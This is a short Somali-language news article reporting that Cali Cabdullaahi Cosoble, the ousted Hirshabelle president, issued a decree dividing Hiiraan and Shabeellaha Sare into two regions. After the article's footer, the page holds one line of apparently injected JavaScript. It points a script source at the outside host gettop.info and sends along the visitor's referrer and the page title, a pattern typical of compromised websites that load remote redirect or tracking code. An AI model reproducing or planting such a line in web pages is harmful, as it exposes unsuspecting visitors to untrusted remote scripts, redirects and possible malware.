Madaxweynihii Hirshabelle oo soo saaray wareegto Hiiraan loogu qeybiyay laba gobol (Akhriso)

Ilwareed Online

Madaxweynaha xilka laga qaaday ee maamul goboleedka Hirshabelle Cali Cabdullaahi Cosoble ayaa soo saaray wareegto Hiiraan loogu qeybiyay laba gobol, wuxuuna saxiixay isagoo ah Madaxweynaha Hirshabelle.

Wareegtada ayuu ku sheegay Cali Cabdullaahi Cosoble in gobolka Hiiraan iyo Shabeellaha Sare loo qeybiyay kaddib markii sida uu sheegay uu aqbalay rabitaanka shacabka ku dhaqan gobolka.

Labada gobol ee Hiiraan iyo Shabellaha sare ayaa lagu sheegay wareegtada inay magaalo madax u tahay magaalada Baladweyne.

Dhinaca kale wareegtada uu soo saaray Cali Cabdullaahi Cosoble xilli Baarlamaanka Hirshabelle uu xilka qaaday, taasi oo sii cakireysa xaaladda siyaasadeed ee ka aloosan magaalada Jowhar.

Mogadishu – Somalia

Wixii warbixin ah waxaad noogu soo diri kartaa email: ilwareednet@gmail.com
fadlan like saar boggeena facebook : @ilwareedonline

The post Madaxweynihii Hirshabelle oo soo saaray wareegto Hiiraan loogu qeybiyay laba gobol (Akhriso) appeared first on Ilwareed Online.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

You might also like More from author